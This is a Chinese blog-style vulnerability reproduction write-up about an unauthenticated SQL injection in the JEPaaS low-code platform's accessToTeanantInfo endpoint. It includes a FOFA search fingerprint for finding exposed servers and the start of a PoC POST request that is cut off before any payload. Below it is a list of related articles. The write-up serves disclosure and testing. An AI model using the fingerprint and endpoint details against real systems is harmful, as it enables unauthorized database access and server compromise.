首页 > 数据库 >JEPaaS 低代码平台 accessToTeanantInfo SQL注入漏洞复现

JEPaaS 低代码平台 accessToTeanantInfo SQL注入漏洞复现

时间:2024-05-29 16:34:20浏览次数:35  
标签:JEPaaS 代码 平台 漏洞 开发 SQL accessToTeanantInfo

0x01 产品简介

JEPaaS低代码开发平台开源版 旨在帮助企业快速实现信息化和数字化转型。该平台基于可视化开发环境,让软件开发人员和业务用户通过直观的可视化界面来构建应用程序 ,而不是传统的编写代码方式。 用户可以在开发平台灵活各个图形化控件,以构建业务流程、逻辑和数据模型等所需的功能,必要时还可以添加自己的代码。该平台基于可视化开发环境,通过低代码拖拽式配置开发,大幅简化开发流程,提高开发效率。以其强大的功能和灵活性,适用于各种企业信息化管理系统的搭建,包括OA、ERP、CRM、HR等,并支持集团公司部署。

0x02 漏洞概述

JEPaaS 低代码平台 accessToTeanantInfo 接口处存在SQL注入漏洞,未经身份验证的远程攻击者可利用内部默认的key参数绕过权限认证进行注入,获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。

0x03 复现环境

FOFA:icon_hash="-999810473"

0x04 漏洞复现

PoC

POST /rbac/im/accessToTeanantInfo HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.

标签:JEPaaS,代码,平台,漏洞,开发,SQL,accessToTeanantInfo
From: https://blog.csdn.net/qq_41904294/article/details/139292053

相关文章

  • 中成科信票务管理系统 ReserveTicketManagerPlane.ashx SQL注入漏洞复现
    0x01产品简介中成科信票务管理系统是专注于演出剧院、体育场馆、旅游景区、游乐园、场地活动的票务管理系统,并为特殊客户量身定制票务应用解决方案,可根据用户的要求采用不同的技术载体实现门票的防伪:二维条码门票防伪技术、RFID电子门票防伪技术、手机二维码门票技术、变温......
  • ETLCloud中如何执行SQL脚本
    SQL脚本在数据库管理与数据分析的广阔领域中,SQL(Structured Query Language,结构化查询语言)脚本扮演着举足轻重的角色。作为一门专为关系型数据库设计的编程语言,SQL不仅能够执行数据的检索、更新、插入及删除等基本操作,还支持高级功能,如数据分组、聚合计算、子查询及连接多个表以......
  • Java语言,MySQL数据库;SSM 心理咨询预约管理系统19086(免费领源码)计算机毕业设计项目推荐
    目 录摘要1绪论1.1背景及意义1.2研究现状1.3ssm框架介绍1.4论文结构与章节安排2 心理咨询预约管理系统系统分析2.1可行性分析2.1.1技术可行性分析2.1.2经济可行性分析2.1.3法律可行性分析2.2系统功能分析2.2.1功能性分析2.2.2非功能......
  • MySQL安装教程(详细)
    文章目录一、安装准备1.1mysql数据库下载1.2数据库运行环境下载二、安装步骤2.1开始安装2.2选择安装类型2.3选择功能2.4检测安装环境2.5功能安装2.6功能安装完成,点击next2.7产品配置,点击next2.8网络通信配置2.9帐户设置(很重要)2.10数据库实例名设置,默认next......
  • python3.x中ORM框架SQLObject使用SQLite数据库随笔
    1、如果未安装SQLObject首先要安装,在管理员CMD下,输入如下命令:pipinstallsqlobject2、创建数据库文件,并建立数据库连接,通过修改SQLObject内置的sqlhub的processConnection属性,具体代码如下sqlobject.sqlhub.processConnection=sqlobject.connectionForURI('sqlite:.......
  • 湘潭大学软件工程专业oracle-sqlplus安装教程
    前言笔者在网上找了一些教程,但是没有装好,或者不知道啥原因,反正就是登不进去老师要求的系统,连接不上服务器,非常苦恼,请教了一下同学,终于弄好了,本文希望能帮助到和我一样有相同困扰的同学下载压缩包首先是下载安装包,按照我的理解,应该是下载下面这个压缩包就行了先打开老师......
  • mysql GROUP_CONCAT()函数
    一、GROUP_CONCAT函数语法函数语法:group_concat([DISTINCT]需要连接的字段[OrderBY排序字段ASC/DESC][Separator'分隔符'])GROUP_CONCAT()函数分隔符GROUP_CONCAT()函数默认是逗号分隔修改GROUP_CONCAT(exprSEPARATOR'分隔符')GROUP_CONCAT()函数去重G......
  • sql涉及姓名排序--2种排序选择
    第一种:按字符的编码值(ASCII或Unicode值)进行排序ORDERBYscoreDESC,SUBSTR(stuName,1,1)DESC;Oracle会比较`stuName`的第一个字符的编码值(ASCII或Unicode值)来决定顺序。第二种:按照姓氏的拼音顺序进行排序ORDERBYscoreDESC,NLSSORT(SUBSTR(stu......
  • 基于Spring Boot+MySQL的物流智能化管理系统设计与实现
    目录1系统概述11.1研究背景11.2研究目的11.3系统设计思想12相关技术22.1MYSQL数据库22.2B/S结构32.3SpringBoot框架简介43系统分析43.1可行性分析43.1.1技术可行性43.1.2经济可行性53.1.3操作可行性53.2系统性能分析53.2.1系统安全性5......
  • MySQL--主从复制
    目录一、主从复制原理1.简要原理2.涉及到的文件3.涉及到的线程4.主从复制执行步骤(重点)二、主从复制搭建1.准备两台以上的数据库实例,要求数据库版本一致2.区分不同角色3.主库开启二进制日志4.主库创建专用复制用户,赋予权限5.备份主库数据,恢复从库6.开启从库复制功能......